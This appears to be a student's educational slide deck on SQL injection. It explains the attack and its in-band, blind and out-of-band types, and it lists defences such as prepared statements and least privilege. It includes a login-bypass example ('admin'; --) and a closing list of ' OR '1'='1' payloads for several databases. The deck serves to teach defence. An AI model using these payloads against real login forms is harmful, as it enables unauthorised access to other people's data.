SQL Injection attack

SQL
INJECTION
By:
Rayudu babu
School of Cyber Security
International institute of digital
technologies

Contents:
What is SQL
What is SQL injection attack
Is SQL injection is Serious Problem
Types of SQL Injection
Solutions for SQL injection attack

What is SQL:
SQL = Structured Query Language
SQL is language in which one can talk to the database
 can execute queries against a database
 can retrieve data from a database
 can insert records in a database
 can update records in a database
 can delete records from a database
 can create new databases
 can create new tables in a database

What is SQL injection attack:
It is an injection attack here the attacker can executes the malicious SQL
statements(Quires) that controls the web application’s database server.
Attackers intent in SQLI:
 Determining the database schema
 Extracting the data
 Adding or modifying the data
 Bypassing the authentication

Pre Learning-Study of SQL Query:
"SELECT * FROM users WHERE username = 'bob' AND password = ’bob123’”;
Meaning of special characters in that statement:
* (asterisk) is an instruction for the SQL database to return all columns for the selected
database row
= (equals) is an instruction for the SQL database to only return values that match the
searched string
' (single quote mark) is used to tell the SQL database where the search string starts or
ends

Example of SQL injection:
consider the following example in which a website user is able to change the values
of '$user' and '$password', such as in a login form:
$statement = "SELECT * FROM users WHERE username = '$user' AND password=
'$password'";
An attacker can easily insert any special SQL syntax inside the statement, if the input
is not sanitized by the application:
$statement = "SELECT * FROM users WHERE username = 'admin'; -- ' AND
password ='anything’”;
Here (admin'; --) is the attacker's input, which contains two new, special characters:
; (semicolon) is used to instruct the SQL parser that the current statement has ended.
-- (double hyphen) instructs the SQL parser that the rest of the line is a comment and
should not be executed
This SQL injection effectively removes the password verification, and returns a
dataset for an existing user – 'admin' in this case. The attacker can now log in with an
administrator account, without having to specify a password.

Is SQL injection is serious problem: 100% yes
The attacker can delete ,modify or even steal your
data
Compromises the safety, security and trust of user
data
Compromises a company’s competitiveness or even
the ability to stay in the business.

Types of SQL injection:
SQL injection
In-band SQLI
Inferential/blind
SQLI
Out-of-band SQLI

In-band SQL injection:
In-band SQL Injection occurs when an attacker is able to use the same
communication channel to both launch the attack and gather results.
In-band SQLI is two types:
In-band SQLI
Error based SQLI
Union based SQLI

Error based SQLI:
It is an in-band SQL Injection technique that relies on
error messages thrown by the database server to obtain information
about the structure of the database.
Union-based SQLI:
It is also SQL injection technique that leverages the UNION SQL
operator to combine the results of two or more SELECT statements
into a single result which is then returned as part of the HTTP response.

Inferential SQLI /Blind SQLI:
In an inferential SQLI attack, no data is actually transferred via the web
application and the attacker would not be able to see the result of an attack web
application (which is why such attacks are commonly referred to as “blind SQL
Injection attacks”). Instead, an attacker is able to reconstruct the database structure
by sending payloads, observing the web application’s response and the resulting
behaviour of the database server.
Blind SQLI
Boolean-based Blind SQLI
Time-based Blind SQLI

Boolean-based Blind SQLI
 Attacker sends an SQL query to the database which forces the application to return a
different result depending on whether the query returns a TRUE or FALSE result.
 Depending on the result, the content within the HTTP response will change, or remain the
same. This allows an attacker to infer if the payload used returned true or false, even
though no data from the database is returned.
Time-based SQL Injection
 The attacker sends an SQL query to the database which forces the database to wait for a
specified amount of time (in seconds) before responding. The response time will indicate
to the attacker whether the result of the query is TRUE or FALSE.
 Depending on the result, an HTTP response will be returned with a delay, or returned
immediately. This allows an attacker to infer if the payload used returned true or false,
even though no data from the database is returned.

Out-of-band SQL Injection :
It occurs when an attacker is unable to use the same
channel to launch the attack and gather results.

Solutions for SQL injection:
Input validation
Prepare statement
Escape string
Minimize the Privileges assigned to every database
account in your database
Do not assign DBA or admin type access rights to
your application accounts
Note:
http://bobby-tables.com/
Bobby Tables: A guide to preventing SQL injection

Reference:
SQL statements to control the sql query:
-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16
 https://www.owasp.org/index.php/SQL_Injection
 https://www.nds.rub.de/media/hfs/attachments/files/2010/03/hackpra0
9_kornburst_advanced_sql_injection.pdf
 https://www.acunetix.com/websitesecurity/sql-injection/
 http://bobby-tables.com/
 https://www.netsparker.com/blog/web-security/sql-injection-
vulnerability/
 https://www.youtube.com/watch?v=PB7hWlqTSqs

http://securityidiots.com/Web-Pentest/SQL-Injection/Part-2-Basic-of-SQL-for-
SQLi.html
https://gbhackers.com/manual-sql-injection/

SQL Injection attack

More Related Content

What's hot

Similar to SQL Injection attack

Recently uploaded

SQL Injection attack